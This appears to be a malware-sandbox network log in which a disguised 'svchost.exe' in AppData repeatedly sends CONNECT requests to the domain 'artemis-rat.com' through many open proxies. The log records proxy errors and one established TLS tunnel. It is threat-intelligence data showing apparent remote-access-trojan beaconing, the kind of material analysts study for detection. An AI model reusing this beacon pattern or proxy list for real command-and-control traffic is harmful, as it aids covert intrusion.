Mar 9, 2024 13:14:38.677273035 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3340	192.168.2.5	60656	200.10.73.210	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.620336056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3341	192.168.2.5	60777	104.18.44.93	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.622672081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.778801918 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3342	192.168.2.5	55860	103.81.220.33	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.623204947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.677381039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3343	192.168.2.5	60154	138.36.150.16	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.625386953 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.146047115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3344	192.168.2.5	60701	185.212.60.62	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.630872011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3345	192.168.2.5	55925	119.3.215.41	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.630877018 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3346	192.168.2.5	60779	172.67.181.103	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.630985022 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.786951065 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3347	192.168.2.5	60689	82.65.240.111	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.632308960 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.333458900 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.333681107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3348	192.168.2.5	60215	162.241.46.6	62592	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.633330107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3349	192.168.2.5	60718	64.137.93.62	6519	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.635720968 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.925187111 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3350	192.168.2.5	60813	104.16.72.45	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.639539003 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.795479059 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3351	192.168.2.5	60721	211.253.24.57	3334	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.679708004 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.374197960 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3352	192.168.2.5	60702	65.109.152.88	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.679883003 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.442749977 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3353	192.168.2.5	60755	45.196.151.59	5432	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.680023909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.333405972 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.550231934 CET	308	IN	HTTP/1.1 407 Proxy Authentication Required Server: FaaS v1.3-20220203-7fa38bd5af Date: Sat, 09 Mar 2024 12:14:36 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 65 Proxy-Authenticate: Basic realm="Proxy" Connection: close Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64 Data Ascii: HTTP authorization error: ip auth failed, no credentials provided

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3354	192.168.2.5	60651	45.231.133.51	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.681237936 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.107487917 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:36.110852957 CET	369	OUT	Data Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 aa 31 a4 fc 92 9a 7e fc 18 cb 8c 27 b0 ef b7 b8 48 b2 f7 ce bb 74 ea 2e bb 17 ee 1b c2 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: lheR1~'Ht.*,+0/$#('=<5/artemis-rat.com#.i,7wpn(E6uJ+l0A;lh_TujssX
Mar 9, 2024 13:14:36.675211906 CET	536	IN	Data Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ec 52 ac ce be 54 3a e0 37 a3 e3 6c ee 0e 32 67 a5 50 90 6d d9 e1 64 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00 Data Ascii: C?eRT:7l2gPmdDOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
Mar 9, 2024 13:14:36.675276041 CET	536	IN	Data Raw: c6 05 92 78 e0 4f 78 0a d2 60 c4 1d 4d 2f 50 10 83 ed 02 03 01 00 01 a3 82 02 75 30 82 02 71 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 05 a0 30 13 06 03 55 1d 25 04 0c 30 0a 06 08 2b 06 01 05 05 07 03 01 30 0c 06 03 55 1d 13 01 01 ff 04 02 30 00 Data Ascii: xOx`M/Pu0q0U0U%0+0U00U<IXM%A'CF20U#0n+_+0x+l0j05+0)http://ocsp.pki.goog/s/gts1p5/4mHaPTRzkCs01+0%http://pki.g
Mar 9, 2024 13:14:36.675295115 CET	376	IN	Data Raw: 00 76 00 da b6 bf 6b 3f b5 b6 22 9f 9b c2 bb 5c 6b e8 70 91 71 6c bb 51 84 85 34 bd a4 3d 30 48 d7 fb ab 00 00 01 8d aa 09 6c 5a 00 00 04 03 00 47 30 45 02 20 14 4e 3d 50 55 e8 cc 24 1d 57 8b ac c0 53 a0 61 43 18 61 8b d3 67 2d ed cd aa b3 4e 5c Data Ascii: vk?"\kpqlQ4=0HlZG0E N=PU$WSaCag-N\:b!ixanr9,1rtlY0*HR5zo_$F\|QNc4+G@]LiY%}+]24'-6TsnqM}oVM)k+T/
Mar 9, 2024 13:14:36.876533985 CET	536	IN	Data Raw: 7c f0 30 c1 81 dd bd 46 3c 84 41 91 c0 f9 72 70 be e9 27 7e 00 05 90 30 82 05 8c 30 82 03 74 a0 03 02 01 02 02 0d 02 03 bc 50 a3 27 53 f0 91 80 22 ed f1 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 Data Ascii: \|0F<Arp'~00tP'S"0*H0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R10200813000042Z270930000042Z0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P5
Mar 9, 2024 13:14:36.876607895 CET	536	IN	Data Raw: 01 a3 82 01 76 30 82 01 72 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 01 86 30 1d 06 03 55 1d 25 04 16 30 14 06 08 2b 06 01 05 05 07 03 01 06 08 2b 06 01 05 05 07 03 02 30 12 06 03 55 1d 13 01 01 ff 04 08 30 06 01 01 ff 02 01 00 30 1d 06 03 55 1d Data Ascii: v0r0U0U%0++0U00Un+_+0U#0+&q+H'/Rf,q>0h+\0Z0&+0http://ocsp.pki.goog/gtsr100+0$http://pki.goog/repo/certs/gtsr1.
Mar 9, 2024 13:14:36.876614094 CET	536	IN	Data Raw: b8 47 b5 e9 96 b5 9f 07 cd a6 ab 3e 32 8a c0 86 83 c5 c1 41 c8 9f 2f 35 8e 0d c0 07 7a e1 ac c9 65 b5 cb 8a a7 dd 71 d8 61 65 39 84 ac 32 3e f7 7a 36 f1 56 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 Data Ascii: G>2A/5zeqae92>z6VWAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?'>#ZB-z6=`9cxN!>\9+S/tgw7-[pe
Mar 9, 2024 13:14:36.876653910 CET	536	IN	Data Raw: 32 38 30 30 30 30 34 32 5a 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 22 30 20 06 03 55 04 0a 13 19 47 6f 6f 67 6c 65 20 54 72 75 73 74 20 53 65 72 76 69 63 65 73 20 4c 4c 43 31 14 30 12 06 03 55 04 03 13 0b 47 54 53 20 52 6f 6f 74 20 52 31 Data Ascii: 28000042Z0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R10"0*H0w;>@<}2qj.K+^R#'c~^hZGM3NlKd)%#=.`
Mar 9, 2024 13:14:36.876749992 CET	536	IN	Data Raw: 3a 66 ec 07 8a 26 df 13 d7 57 65 78 27 de 5e 49 14 00 a2 00 7f 9a a8 21 b6 a9 b1 95 b0 a5 b9 0d 16 11 da c7 6c 48 3c 40 e0 7e 0d 5a cd 56 3c d1 97 05 b9 cb 4b ed 39 4b 9c c4 3f d2 55 13 6e 24 b0 d6 71 fa f4 c1 ba cc ed 1b f5 fe 81 41 d8 00 98 3d Data Ascii: :f&Wex'^I!lH<@~ZV<K9K?Un$qA=:z78040U0U00U+&q+H'/Rf,q>0U#0`{fEP/}4K0`+T0R0%+0http://ocsp.
Mar 9, 2024 13:14:36.876776934 CET	466	IN	Data Raw: a1 e4 1a d6 fd 6f 83 81 6f ef 8c cf 97 af c0 85 2a f0 f5 4e 69 09 91 2d e1 68 b8 c1 2b 73 e9 d4 d9 fc 22 c0 37 1f 0b 66 1d 49 ed 02 55 8f 67 e1 32 d7 d3 26 bf 70 e3 3d f4 67 6d 3d 7c e5 34 88 e3 32 fa a7 6e 06 6a 6f bd 8b 91 ee 16 4b e8 3b a9 b3 Data Ascii: ooNi-h+s"7fIUg2&p=gm=\|42njoK;7D~lF!fUl)f[wIH(3rS5b$9~AR?,( uDQPtQZ\|ep1y}Lb3$phP:Gu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3355	192.168.2.5	60753	209.126.104.38	40750	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.681276083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3356	192.168.2.5	60717	5.252.23.220	1081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.682874918 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3357	192.168.2.5	56165	161.97.173.42	53948	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.689062119 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3358	192.168.2.5	60732	185.101.16.52	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.695264101 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3359	192.168.2.5	60867	172.67.150.173	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.697521925 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.851814985 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3360	192.168.2.5	60860	162.159.242.252	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.697710991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.858741999 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3361	192.168.2.5	60739	103.118.46.177	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.701853991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3362	192.168.2.5	60636	5.44.42.115	58386	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.702056885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3363	192.168.2.5	60673	103.242.119.88	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.704991102 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
